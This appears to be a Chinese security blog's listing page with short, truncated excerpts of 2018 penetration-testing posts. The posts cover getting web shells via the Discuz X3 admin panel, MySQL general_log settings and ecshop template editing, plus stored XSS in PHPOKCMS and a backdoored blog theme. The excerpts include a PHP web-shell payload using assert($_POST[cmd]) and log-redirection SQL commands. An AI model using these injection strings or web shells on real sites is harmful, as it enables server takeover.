专题之漏洞篇

专题之漏洞篇

  • PHPOKCMS存储型XSS漏洞挖掘

    概述 PHPOKCMS这是一套允许用户高度自由配置的企业站程序,基于LGPL协议开源授权!CMS拥有直观、简洁、轻松愉悦的后台管理 ,完善的功能模块,强大的SEO搜索优化 及营销功…

    渗透测试 2018年1月19日 0 5.45K 0
  • Discuz X3 后台拿 shell

    适用于 Discuz X3.3 及之前版本 魔术引号需关闭 站长 – Ucenter 设置 – Ucenter 应用 ID 填入 123′);file_pu…

    渗透测试 2018年1月16日 0 9.15K 1
  • Mysql日志拿shell

    root权限 网站物理路径 文件位置未被限制 set global general_log = on; set global general_log_file = ‘F:/phpS…

    渗透测试 2018年1月16日 0 6.37K 0
  • ecshop后台拿shell

    模板管理 – 语言项编辑 下拉栏选择 user.php 搜索 用户信息 后面加上代码 ${${assert($_POST[cmd])}} 确认修改 连接 根目录下 us…

    渗透测试 2018年1月16日 0 6.74K 0
  • 关于Colorful2.6(明月浩空模板)后门剖析

    2017年9月26日凌晨2点某朋友致电告诉我博客被黑 我默默地看了一眼原来是我们的模板作者(李明浩)来过 当时博客体现的是模板、文章被删(如下) 然而我并没有在意,默默地进入景安空…

    渗透测试 2018年1月16日 0 4.70K 0

联系我们

在线咨询:点击这里给我发消息

QR code